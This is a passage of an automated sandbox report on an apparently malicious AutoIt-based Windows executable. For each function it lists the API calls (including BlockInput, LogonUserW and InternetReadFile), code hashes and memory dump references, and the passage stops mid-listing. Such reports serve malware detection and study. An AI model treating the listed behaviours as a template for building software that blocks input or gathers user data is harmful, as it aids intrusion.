                                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                      Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                      Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                      Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 901099227-0
                                                      • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                      • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                      Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Proc
                                                      • String ID:
                                                      • API String ID: 2346855178-0
                                                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                      Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                      Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                      Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                      Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                      Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N@
                                                      • API String ID: 0-1509896676
                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                      Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                      Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                      Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                      Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                      Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(?), ref: 0045953B
                                                      • DeleteObject.GDI32(?), ref: 00459551
                                                      • DestroyWindow.USER32(?), ref: 00459563
                                                      • GetDesktopWindow.USER32 ref: 00459581
                                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                                      • _wcslen.LIBCMT ref: 00459916
                                                      • _wcscpy.LIBCMT ref: 0045993A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                      • GetDC.USER32(00000000), ref: 004599FC
                                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 4040870279-2373415609
                                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                      Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0044181E
